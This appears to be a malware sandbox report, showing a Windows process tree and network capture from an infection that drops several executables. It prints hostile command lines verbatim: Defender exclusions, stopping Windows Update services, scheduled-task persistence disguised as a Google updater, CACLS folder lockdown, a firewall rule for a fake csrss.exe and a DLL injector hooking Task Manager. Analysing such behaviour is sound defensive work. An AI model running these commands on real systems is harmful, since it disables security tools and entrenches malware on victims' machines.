- C:\Users\Admin\AppData\Local\Temp\734A.exe
  C:\Users\Admin\AppData\Local\Temp\734A.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5772
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:6056
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 388
    3⤵
    - Program crash
    PID:440
- C:\Users\Admin\AppData\Local\Temp\74F1.exe
  C:\Users\Admin\AppData\Local\Temp\74F1.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:5920
- C:\Users\Admin\AppData\Local\Temp\76E6.exe
  C:\Users\Admin\AppData\Local\Temp\76E6.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5996
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:4680
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:4124
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:4352
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:5300
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        5⤵
        
        PID:5320
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        5⤵
        
        PID:5372
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:5464
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:4108
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:6136
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      Loads dropped DLL
      PID:5536
- C:\Users\Admin\AppData\Local\Temp\BA1A.exe
  C:\Users\Admin\AppData\Local\Temp\BA1A.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3712
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3744
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:4492
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:4064
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      PID:5320
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4616
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5672
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5372
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5716
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5856
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:4852
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4192
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:2400
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:3604
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:2544
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4300
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:2336
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:5356
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:2724
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:3308
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:5312
- - C:\Users\Admin\AppData\Local\Temp\source1.exe
    "C:\Users\Admin\AppData\Local\Temp\source1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:4180
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Executes dropped EXE
    PID:5788
- C:\Users\Admin\AppData\Local\Temp\BE51.exe
  C:\Users\Admin\AppData\Local\Temp\BE51.exe
  2⤵
  - Executes dropped EXE
  PID:5772
- C:\Users\Admin\AppData\Local\Temp\C055.exe
  C:\Users\Admin\AppData\Local\Temp\C055.exe
  2⤵
  - Executes dropped EXE
  PID:4504
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:6040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xa8,0x108,0x7ffd7fbd46f8,0x7ffd7fbd4708,0x7ffd7fbd4718
      4⤵
      PID:3852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=C055.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:5360
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd7fbd46f8,0x7ffd7fbd4708,0x7ffd7fbd4718
      4⤵
      PID:5532
- C:\Users\Admin\AppData\Local\Temp\C279.exe
  C:\Users\Admin\AppData\Local\Temp\C279.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5248
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Executes dropped EXE
  PID:4064
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5872
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5328
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2908
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:5136
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6032
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5836
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:5356
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3352
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5640
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:5048
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1692
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Drops file in Program Files directory
  PID:5788
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4204
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1572
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5884
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4212
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:760
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5780
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Modifies data under HKEY_USERS
    PID:5716
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3856
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:1364
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:6140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:5824
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:5948
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3872 -ip 3872
1⤵
PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 3256 -ip 3256
1⤵
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4144 -ip 4144
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4352 -ip 4352
1⤵
PID:3344

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5476 -ip 5476
1⤵
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5772 -ip 5772
1⤵
PID:6124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5816 -ip 5816
1⤵
PID:2952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6084 -ip 6084
1⤵
PID:2152

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5148

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Executes dropped EXE
PID:5864

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3852

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:4892

Network

DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __Host-GAPS=1:J8vgyEckN0HhFnZPrv0jW-GcedMqmg:qsQ6VwCZwEcFA_IZ
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.30.27
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.30.35
DNS

27.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

27.30.240.157.in-addr.arpa

IN PTR

Response

27.30.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-prg1fbcdnnet
DNS

35.30.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.30.240.157.in-addr.arpa

IN PTR

Response

35.30.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-prg1facebookcom
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.30.35
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.30.35
DNS

195.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.179.250.142.in-addr.arpa

IN PTR

Response

195.179.250.142.in-addr.arpa

IN PTR

ams15s42-in-f31e100net
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

183.59.114.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.59.114.20.in-addr.arpa

IN PTR

Response
DNS

play.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.251.36.14
OPTIONS

https://play.google.com/log?format=json&hasfast=true&authuser=0

msedge.exe

Remote address:

142.251.36.14:443

Request

OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
host: play.google.com
accept: */*
access-control-request-method: POST
access-control-request-headers: x-goog-authuser
origin: https://accounts.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: same-site
sec-fetch-dest: empty
referer: https://accounts.google.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

14.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.36.251.142.in-addr.arpa

IN PTR

Response

14.36.251.142.in-addr.arpa

IN PTR

ams15s44-in-f141e100net
DNS

196.168.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.168.217.172.in-addr.arpa

IN PTR

Response

196.168.217.172.in-addr.arpa

IN PTR

ams16s32-in-f41e100net
DNS

77.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.121.18.2.in-addr.arpa

IN PTR

Response

77.121.18.2.in-addr.arpa

IN PTR

a2-18-121-77deploystaticakamaitechnologiescom
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301572_19YNEY0IZVD56CZX6&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301572_19YNEY0IZVD56CZX6&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 328228
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 64D1D5C007B24206B5138E8442AFC9CA Ref B: AMS04EDGE3311 Ref C: 2023-10-10T17:35:20Z
date: Tue, 10 Oct 2023 17:35:19 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301163_185KLCMO7GUZRYZ5H&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301163_185KLCMO7GUZRYZ5H&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 447152
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2E541C2117A44F56ADF1534366FEB49E Ref B: AMS04EDGE3311 Ref C: 2023-10-10T17:35:20Z
date: Tue, 10 Oct 2023 17:35:19 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300932_1F3XVYLI2C551DUEM&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300932_1F3XVYLI2C551DUEM&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 473312
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
